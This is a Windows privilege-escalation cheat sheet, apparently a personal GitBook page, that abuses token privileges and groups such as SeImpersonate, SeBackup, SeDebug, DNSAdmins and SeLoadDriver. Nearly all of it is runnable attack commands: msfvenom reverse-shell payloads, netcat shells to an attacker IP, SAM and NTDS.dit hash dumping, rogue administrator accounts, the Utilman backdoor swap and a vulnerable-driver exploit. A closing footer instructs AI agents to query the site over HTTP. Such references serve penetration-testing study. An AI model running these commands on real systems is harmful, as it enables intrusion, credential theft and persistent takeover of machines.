# Abusing Windows Privileges

## SeImpersonatePrivilege

```
whoami /priv | findstr SeImpersonate
```

#### Exploitation

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe

.\SharpEfsPotato.exe -p shell.exe
```

{% hint style="info" icon="lightbulb" %}

* Works in \~98% cases when privilege is enabled
* Alternative tools: PrintSpoofer, JuicyPotato (older systems)
  {% endhint %}

## SeBackupPrivilege

#### Method 1: Dump SAM & SYSTEM

```
mkdir C:\Temp

reg save hklm\sam C:\Temp\sam
reg save hklm\system C:\Temp\system
```

* Download sam, system and extract using impacket-secretsdump or pypykatz

```
pypykatz registry --sam sam system
secretsdump.py -sam sam -system system LOCAL
```

### Method 2: Dump NTDS.dit (Domain Controller)

#### Step 1: Create diskshadow script

```
# l1nuxkid.dsh
set context persistent nowriters
add volume c: alias ntds
create
expose %ntds% X:
```

```
unix2dos l1nuxkid.dsh
```

* Transfer l1nuxkid.dsh to target Windows Machine

```
diskshadow /s l1nuxkid.dsh

robocopy /B X:\Windows\NTDS . ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM
```

* Download ntds.dit and system and then extract hives

```
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
```

## SeTcbPrivilege

#### Exploitation

```
.\tcb.exe "C:\Windows\System32\cmd.exe /c net localgroup administrators l1nuxkid /add"
```

Reverse shell:

```
.\tcb.exe "C:\Windows\System32\cmd.exe /c nc.exe <IP> <PORT> -e cmd"
```

## DNSAdmins Group Abuse

```
whoami /groups
```

#### Exploitation via DLL Injection

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=444 -f dll -o rev.dll
```

#### Step 2: Host DLL

```
impacket-smbserver share . -smb2support
```

#### Step 3: Load DLL

```
dnscmd /config /serverlevelplugindll \\<IP>\share\rev.dll
```

#### Step 4: Restart DNS Service

```
sc.exe stop dns
sc.exe start dns
```

{% hint style="info" %}
Tip (Best Way):
{% endhint %}

```
dnscmd /config /serverlevelplugindll \\<IP>\share\payload.dll
```

## Server Operators Group

```
net user <username>
```

#### Exploitation (service abuse)

```
sc.exe config "VMTools" binPath= "C:\Windows\System32\cmd.exe /k net localgroup administrators <user> /add"

sc.exe start "VMTools"
```

## SeManageVolumePrivilege

#### Exploitation (DLL Hijacking)

```
.\EnableAllTokenPrivs.ps1
.\SeManageVolumeExploit.exe
```

#### Payload

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1337 -f dll -o tzres.dll

copy tzres.dll C:\Windows\System32\wbem\
```

#### Listener

```
nc -lvnp 1337
```

## SeDebugPrivilege

#### Exploitation (Token Manipulation)

```
iwr http://<IP>/psgetsys.ps1 -o psgetsys.ps1
Import-Module .\psgetsys.ps1
```

#### Get SYSTEM via Parent Process

```
Get-Process winlogon
```

```
[MyProcess]::CreateProcessFromParent("<PID>","C:\Windows\System32\cmd.exe","/c net user l1nuxkid Pass123! /add")

[MyProcess]::CreateProcessFromParent("<PID>","C:\Windows\System32\cmd.exe","/c net localgroup administrators l1nuxkid /add")
```

## SeRestorePrivilege

#### Exploitation

```
.\EnableSeRestorePrivilege.ps1
```

```
ren C:\Windows\System32\Utilman.exe Utilman.bak
ren C:\Windows\System32\cmd.exe Utilman.exe
```

#### Trigger

* RDP into machine
* Press Win + U
* Opens SYSTEM shell

## SeLoadDriverPrivilege

```
whoami /priv | findstr SeLoadDriverPrivilege
```

#### Exploitation (Capcom Driver)

#### Upload:

* Capcom.sys
* ExploitCapcom.exe
* LoadDriver.exe
* nc.exe

#### Step 1: Prepare payload

```
nc.exe <IP> 4444 -e cmd.exe > C:\ProgramData\shell.bat
```

#### Step 2: Load Driver

```
.\LoadDriver.exe System\CurrentControlSet\dfserv C:\Path\Capcom.sys
```

#### Step 3: Execute Exploit

```
.\ExploitCapcom.exe .\shell.bat
```

FINAL QUOTE FROM l1nuxkid:

> Only user more privileged than NT AUTHORITY\SYSTEM is Bill Gates


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/privilege-escalation/abusing-windows-privileges.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.